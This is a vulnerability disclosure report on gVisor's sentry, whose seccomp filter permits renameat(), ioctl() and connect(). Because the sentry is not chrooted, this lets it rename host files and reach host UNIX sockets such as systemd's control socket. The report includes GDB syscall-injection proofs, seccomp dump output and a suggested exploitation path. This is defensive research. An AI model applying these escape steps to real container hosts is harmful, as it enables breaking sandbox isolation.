gVisor sentry can call renameat() The seccomp sandbox of the gVisor sentry permits access to the renameat() syscall: https://github.com/google/gvisor/blob/master/runsc/boot/filter/config.go#L71 I've verified that the seccomp filter attached to the sentry process permits renameat(): user@debian:~/seccomp_dump$ ps aux|grep runsc [...] root 1131 [...] /usr/local/bin/runsc [...] root 1136 [...] /usr/local/bin/runsc [...] --file-access=proxy --overlay=false --multi-container=false --network=host --log-packets=false --platform=kvm [...] --bundle /var/run/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/[...] --controller-fd=3 --console=true --io-fds=4 --io-fds=5 --io-fds=6 --io-fds=7 [...] user@debian:~/seccomp_dump$ sudo ./seccomp_dump 1136 simple ===== filter 0 (296 instructions) ===== 0001 if arch != 0xc000003e: [true +0, false +1] -> ret TRAP [...] 0101 if nr == 0x00000108: [true +1, false +0] -> ret ALLOW (syscalls: renameat) 0127 ret TRAP [...] 0092 if nr == 0x00000031: [true +1, false +0] -> ret ALLOW (syscalls: bind) 0127 ret TRAP [...] 006e if nr 0x00000029: [true +0, false +1] 0075 if nr == 0x0000002a: [true +1, false +0] -> ret ALLOW (syscalls: connect) [...] 000f if nr 0x0000000a: [true +0, false +1] 0033 if nr == 0x00000010: [true +3, false +0] -> ret ALLOW (syscalls: ioctl) [...] and the sentry is not chrooted, so this actually permits renaming files in the host filesystem: user@debian:~/seccomp_dump$ sudo ls -l /proc/1136/root/ total 108 [...] dr-xr-xr-x 170 root root 0 Aug 10 22:31 proc -rw-r--r-- 1 root root 10 Aug 10 22:37 REAL_ROOT [...] I have also verified this by injecting a renameat() syscall into the sentry process with GDB: (gdb) info registers rax 0x108 264 rbx 0x1084740 17319744 rcx 0x4574d3 4551891 rdx 0xffffffffffffff9c -100 rsi 0x7ffc7755ce98 140722310598296 rdi 0xffffffffffffff9c -100 rbp 0x7ffc7755dee0 0x7ffc7755dee0 rsp 0x7ffc7755ce98 0x7ffc7755ce98 r8 0x0 0 r9 0x0 0 r10 0x7ffc7755cea0 140722310598304 r11 0x286 646 r12 0xc420040f68 842350727016 r13 0xff 255 r14 0xff 255 r15 0xf 15 rip 0x4574d1 0x4574d1 eflags 0x286 [ PF SF IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) x/s $rsi 0x7ffc7755ce98: "/FOOBAR" (gdb) x/s $r10 0x7ffc7755cea0: "/BARFOO" (gdb) x/1i $rip => 0x4574d1 : syscall (gdb) stepi 0x00000000004574d3 in runtime.futex () (gdb) print $rax $4 = 0 Afterwards, /FOOBAR had moved to /BARFOO on the host. If you wanted to exploit this, you'd probably want to first write a file to disk through gofer, then use this bug to move it to a different location on the backing mount. =============== limited to network passthrough =============== If "--network=host" is enabled, the following things also apply - however, the README warns that "--network=host" reduces isolation, so theses issues are probably less likely to actually affect people. Permitting ioctl() with arbitrary arguments is probably also not a good idea - when "--network=host" is enabled, the sentry runs with full capabilities in the initial user namespace, and a lot of file types have ioctl handlers that have effects beyond the specific file, gated by capable() checks - for example, if an attacker was able to get a file descriptor to any file on an ext4 filesystem, I think EXT4_IOC_RESIZE_FS would permit resizing the ext4 filesystem on which the given file resides (gated by CAP_SYS_RESOURCE). connect() is also dangerous - you can use connect() to connect to UNIX domain sockets. The sentry runs in its own network namespace, so it can't connect to abstract socket addresses that were created by other parts of the system, but since the sentry has access to the real host's filesystem, it can still use UNIX domain sockets in the filesystem domain and e.g. talk to the systemd control socket. Again, testing with GDB: (gdb) x/1i $pc-2 0x4574d1 : syscall (gdb) set $pc=0x4574d1 (gdb) set $rax=42 (gdb) set $rax=41 (gdb) set $rdi = 1 (gdb) set $rsi = 1 (gdb) set $rdx = 0 (gdb) stepi 0x00000000004574d3 in runtime.futex () (gdb) print $rax $1 = 46 [write "\x01\x00/run/systemd/private" to the stack at 0x7ffcafb992e8] (gdb) set $pc=0x4574d1 (gdb) set $rax=42 (gdb) set $rdi = 46 (gdb) set $rsi = 0x7ffcafb992e8 (gdb) set $rdx = 110 (gdb) x/2bx 0x7ffcafb992e8 0x7ffcafb992e8: 0x01 0x00 (gdb) x/s 0x7ffcafb992e8+2 0x7ffcafb992ea: "/run/systemd/private" (gdb) x/1i $pc => 0x4574d1 : syscall (gdb) stepi 0x00000000004574d3 in runtime.futex () (gdb) print $rax $5 = 0 This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: jannh